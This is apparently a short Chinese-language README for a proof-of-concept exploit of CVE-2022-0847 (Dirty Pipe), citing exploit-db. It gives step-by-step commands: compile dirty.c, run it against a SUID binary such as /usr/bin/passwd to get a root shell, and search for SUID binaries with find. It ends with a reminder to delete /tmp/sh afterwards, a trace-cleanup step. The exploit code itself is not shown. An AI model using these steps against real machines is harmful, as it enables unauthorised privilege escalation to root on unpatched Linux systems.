Share
## https://sploitus.com/exploit?id=A714BDDC-3F3E-5762-8D54-A97B7FAD41C4
# CVE-2022-0847 POC
> 来源:https://www.exploit-db.com/exploits/50808
1. 编译
在linux中 `gcc -o dirty dirty.c`编译POC程序
2. 使用
`./dirty SUID`执行程序。其中,SUID是指具有SUID的程序的路径
一般可以用 `/usr/bin/passwd`,也就是执行`./dirty /usr/bin/passwd`
![image-20220315163100154](README.assets/image-20220315163100154.png)
可以获取root的shell
3. 可以使用`find / -perm /4000`查询具有SUID的程序。
![image-20220315164326855](README.assets/image-20220315164326855.png)
![image-20220315164346358](README.assets/image-20220315164346358.png)
4. 别忘了删除 `/tmp/sh`
![image-20220315165450528](README.assets/image-20220315165450528.png)